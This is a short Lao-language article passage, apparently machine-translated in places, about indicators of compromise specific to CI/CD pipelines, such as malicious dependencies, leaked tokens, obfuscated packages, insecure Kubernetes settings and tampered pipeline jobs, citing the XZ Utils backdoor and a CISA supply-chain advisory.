CI/CD pipelines ແມ່ນສະພາບແວດລ້ອມອັດຕະໂນມັດບ່ອນທີ່ນັກພັດທະນາ commit ລະຫັດ, ການດຶງການເພິ່ງພາອາໄສ, ແລະການປ່ອຍ builds. ຜູ້ໂຈມຕີຮູ້ວ່າການປະນີປະນອມໜຶ່ງຢູ່ທີ່ນີ້ຈະໄຫຼຜ່ານທຸກໆການນຳໃຊ້. ດັ່ງນັ້ນ, ຕົວຊີ້ວັດຂອງການປະນີປະນອມແມ່ນຫຍັງ? CI/CD pipelineພວກມັນເບິ່ງແຕກຕ່າງກັນຫຼາຍ:
- ມີການເພີ່ມ dependency ທີ່ເປັນອັນຕະລາຍເຂົ້າໄປໃນ package.json ຫຼື requirements.txt ຢ່າງງຽບໆ.
- ລະຫັດ API ຫຼືໂທເຄັນທີ່ຖືກເປີດເຜີຍໃນ Git commits ຫຼື ໄຟລ໌ .env.
- ລະຫັດທີ່ສັບສົນຖືກສັກເຂົ້າໄປໃນແພັກເກດ npm ຫຼື PyPI.
- ໄຟລ໌ Terraform ຫຼື Kubernetes ທີ່ມີຄ່າເລີ່ມຕົ້ນທີ່ບໍ່ປອດໄພເຊັ່ນ privileged: true.
- Pipeline ວຽກທີ່ຖືກແກ້ໄຂເພື່ອກັ່ນຕອງຂໍ້ມູນ ຫຼື ເປີດປະຕູຫຼັງ.
ສັນຍານປະນີປະນອມເຫຼົ່ານີ້ໃນ CI/CD ຍັງຄົງເບິ່ງບໍ່ເຫັນ standard ເຄື່ອງມືຄວາມປອດໄພ.
ຊ່ອງຫວ່າງໃນຄວາມປອດໄພທາງໄຊເບີຂອງ IOC
ເຖິງແມ່ນວ່າຫຼາຍທີມເຂົ້າໃຈຄຸນຄ່າຂອງຕົວຊີ້ວັດການປະນີປະນອມ, ແຕ່ພວກເຂົາຍັງອີງໃສ່ພຽງແຕ່ການກວດຈັບຈາກເຊີບເວີ ແລະ ບັນທຶກເຄືອຂ່າຍເທົ່ານັ້ນ. ດັ່ງນັ້ນ, ຜູ້ໂຈມຕີສາມາດວາງສານພິດໃສ່ builds ຫຼື ໃສ່ມັນແວໂດຍບໍ່ປະໄວ້ຮ່ອງຮອຍຕາມປົກກະຕິ. ນີ້ແມ່ນເຫດຜົນທີ່ເຫດການຕ່າງໆເຊັ່ນ: backdoor XZ Utils ຫຼື ແພັກເກດ npm ທີ່ເປັນອັນຕະລາຍຈຶ່ງບໍ່ໄດ້ຮັບການກວດພົບຈົນກວ່າພວກມັນຈະຮອດການຜະລິດ.
ການປະນີປະນອມລະບົບຕ່ອງໂສ້ການສະໜອງປະເພດນີ້ຍັງຖືກເນັ້ນໃຫ້ເຫັນໂດຍ CISຄຳແນະນຳກ່ຽວກັບຄວາມປອດໄພຂອງລະບົບຕ່ອງໂສ້ການສະໜອງຂອງ A, ເຊິ່ງເຕືອນວ່າຜູ້ໂຈມຕີມີເປົ້າໝາຍເພີ່ມຂຶ້ນເລື້ອຍໆ CI/CD pipelines ແລະທະບຽນ.
The Takeaway
ຄວາມປອດໄພທາງໄຊເບີແບບດັ້ງເດີມຂອງ IOC ແມ່ນມີຄວາມຈຳເປັນແຕ່ບໍ່ພຽງພໍ. ເໜືອສິ່ງອື່ນໃດ, ທີມງານຕ້ອງຮັບຮູ້ຕົວຊີ້ວັດຂອງການປະນີປະນອມສະເພາະກັບ CI/CD pipelines. ຫຼັງຈາກນັ້ນເຂົາເຈົ້າຈຶ່ງສາມາດກວດຫາລະຫັດທີ່ເປັນອັນຕະລາຍ ຫຼື pipeline ການລ່ວງລະເມີດກ່ອນທີ່ມັນຈະແຜ່ລາມໄປທົ່ວສະພາບແວດລ້ອມ.





